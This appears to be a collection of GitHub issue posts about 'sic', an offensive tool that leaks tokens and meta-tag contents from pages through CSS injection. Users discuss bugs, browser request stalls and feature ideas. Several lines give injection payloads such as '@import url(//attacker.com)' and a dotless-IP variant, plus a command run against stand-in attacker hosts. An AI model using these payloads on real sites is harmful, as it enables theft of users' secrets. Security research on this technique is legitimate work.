d0nutptr / sic Goto Github PK

Hey d0nut,
Cannot get tokens starting with a number?

Thanks

I tried exfiltrating <meta> tag and it gets stuck - it makes 2 requests and then all other requests are set to pending. I have to click on meta in source code to continue exfiltrating.

After doing this and clicking on request it says Stalled - clicking on Explaination I found out that it's queueing the requests for some of these reasons:

• There are higher priority requests.
• There are already six TCP connections open for this origin, which is the limit. Applies to HTTP/1.0 and HTTP/1.1 only.
• The browser is briefly allocating space in the disk cache

Is there any way this can be fixed or bypassed?

Hi,

First, great article + finding + tool 😉
I try to reuse it years later with different browser (firefox, chrome). I did not succeed to make it works.
As I struggle a bit in rust I have not been able to modify the code to my wish (I wrote my own "clone" of your idea in go. it works with a bot but with my browsers not)

So my question is simple, do you know if the trick always works ? If yes on which browser?

Thank in advance

Hey d0nut,

In testing the use of Nginx to terminate HTTPs connections for sic I receive the following error:

thread 'tokio-runtime-worker-0' panicked at 'called `Result::unwrap()` on an `Err` value: RelativeUrlWithoutBase', src/libcore/result.rs:999:5

This happens when supplying a Protocol Relative URL as the Polling or Callback host like this:

./sic -p 3000 --ph "//a.pwnu.net" --ch "//b.pwnu.net" -t template_file

Using Protocol Relative URLs would allow sic payloads to work on both HTTP and HTTPs pages simultaneously.

BTW - Here's the example Nginx config I promised you.

Best,
NBK

Hey d0nut,

So I thought it was the proxy that was introducing latency, but actually even directly connected to the internet, my speeds are nowhere near the ones in your demo video. It's taking about 2 minutes to discover 5-7 characters.

Before I start doing packet capture/analysis I wanted to make sure that you haven't run into this problem before. I'm testing w/ Chrome and FF on Win 10, sic is running on an Ubuntu VPS w/out firewall. Did you have any special TCP settings on the client or server?

Also, lack of a Content-Type header is causing IE to not evaluate the CSS.

Also, also, I see mention of an environmental variable for debugging. How is that used?

Thanks

Hey d0nut, here's another enhancement request.

Since we're specifying charset on the command line, why not also allow specifying a default staging len value. This way if no path is specified, a targeted payload could still be delivered.

For example if we could only inject (assuming protocol relative url support):
@import url(//attacker.com)
Then a payload could be generated using whatever len argument was specified via the command line (a sensible default, like 12 could be assumed if none is provided via URL or CLI).

This would have the advantage of limiting the characters required for successful injection to only ().a-z/ . This could be reduced further to just ()0-9/ using dotless IP to just:

@import url(//16843009)

Wouldn't that be cool?